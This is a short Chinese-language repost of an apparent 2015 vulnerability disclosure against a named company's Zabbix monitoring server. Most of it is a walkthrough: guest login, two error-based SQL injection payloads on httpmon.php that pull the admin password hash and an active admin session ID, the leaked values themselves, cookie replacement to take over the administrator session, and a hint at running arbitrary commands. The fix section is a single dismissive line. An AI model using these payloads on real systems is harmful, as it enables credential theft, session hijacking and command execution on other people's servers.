精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

盛大广告ZabbixSQL注入导致命令执行及修复

2015-01-20 11:42 来源: 编辑:admin
盛大广告 Zabbix地址 http://zabbix.sa.snyu.com/   guest没禁用 先用guest直接登陆   然后来到这里 检测发现报错   尝试构造语句注入     httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)   爆出干货    adnin 21bf5f24883e20465a9876c4aa8a4dc9   无奈小弟能力有限 21bf5f24883e20465a9876c4aa8a4dc9 MD5解不开 换个思路继续   尝试cookie欺骗 构造语句     httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid=1 LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)   爆出session     session:00afc31ea35f3f156ebb5c4b3b119be3   然后进行欺骗 直接替换zbx_sessionid为这个00afc31ea35f3f156ebb5c4b3b119be3   成功以administrator登陆   再来到这里 指令随意改   然后来到这里 可以执行刚才设置的指令    

就到这里了 继续的话你懂得 我就不试了.       修复方案:

过滤~ 你比我懂~    
标签
返回首页
扫描微信
返回顶部